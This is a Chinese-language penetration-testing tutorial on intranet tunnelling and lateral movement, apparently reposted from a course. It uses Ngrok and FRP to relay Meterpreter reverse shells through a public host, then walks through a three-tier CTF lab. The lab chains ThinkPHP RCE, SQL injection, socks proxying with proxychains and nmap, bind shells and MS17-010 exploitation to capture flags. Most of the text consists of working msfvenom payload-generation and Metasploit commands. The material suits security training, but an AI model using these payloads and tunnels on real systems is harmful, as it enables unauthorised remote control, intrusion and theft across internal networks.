七十:內網安全-域橫向內網漫游Socks代理隧道技術


必要基礎知識點:

1.內外網簡單知識
2.內網1和內網2通信問題
3.正反向協議通信連接問題
4.內網穿透代理隧道技術說明

演示案例:
• 內網穿透Ngrok測試演示-兩個內網通訊上線
• 內網穿透Frp自建跳板測試-兩個內網通訊上線
• CFS三層內網漫游安全測試演練-某CTF線下2019

案例1-內網穿透Ngrok測試演示-兩個內網通訊上線

實驗環境:兩個不同的內網(有網絡)實現穿透控制
1.注冊-購買-填寫-確認http://www.ngrok.cc/
協議:http 本地端口:192.168.76.132:4444
2.測試:內網1執行后門-免費主機處理-內網2監聽-內網2接受器
./sunny clientid aa0676878c162ffc
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit

案例2-內網穿透Frp自建跳板測試-兩個內網通訊上線

自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務端-下載-解壓-修改-啟動(阿里雲主機記得修改安全組配置出入口)
服務器修改配置文件frps.ini:
[common]
bind_port = 6677
啟動服務端:
./frps -c ./frps.ini
2.控制端-下載-解壓-修改-啟動
控制端修改配置文件frpc.ini:
[common]
server_addr = 你的雲主機ip
server_port = 6677 #frpc工作端口,必須和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的5555
remote_port = 6000 #服務端用6000端口轉發給本機
啟動客戶端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
3.靶機運行frp即可

案例3-CFS三層內網漫游安全測試演練-某CTF線下2019

來源2019某CTF線下賽真題內網結合WEB攻防題庫,涉及WEB攻擊,內網代理路由等技術,每台服務器存在一個Flag,獲取每一個Flag對應一個積分,獲取三個Flag結尾。
Target1:
探針目標-利用WEB漏洞(TP5_RCE)-獲取webshell權限-獲取Flag-Target2
1.生成后門:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
2.接受反彈:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
3.信息收集及配置訪問
獲取網絡接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.22.0/24
開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
4.利用本地代理接口訪問測試
設置瀏覽器代理進行訪問測試
linux:
配置proxychains后調用工具探針Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:掃描主機檢測其是否受到數據包過濾軟件或防火牆的保護。
-sT:掃描TCP數據包已建立的連接connect
windows:
利用代理工具Proxifier或SocksCap64載入代理進行進程訪問測試

Target2:
探針目標-利用WEB漏洞(SQL注入)-后台獲取webshell權限-獲取Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后台
http://192.168.22.128/index.php?r=special #后門shell
1.生成正向后門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.信息收集及配置訪問
獲取網絡接口:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
Target3:
探針目標-端口及漏洞掃描-利用MS17010獲取系統權限-獲取Flag-GG
proxychains4 nmap -Pn -sT 192.168.33.33
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
shell
dir /S flag.txt /B
type xxxxx.txt


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM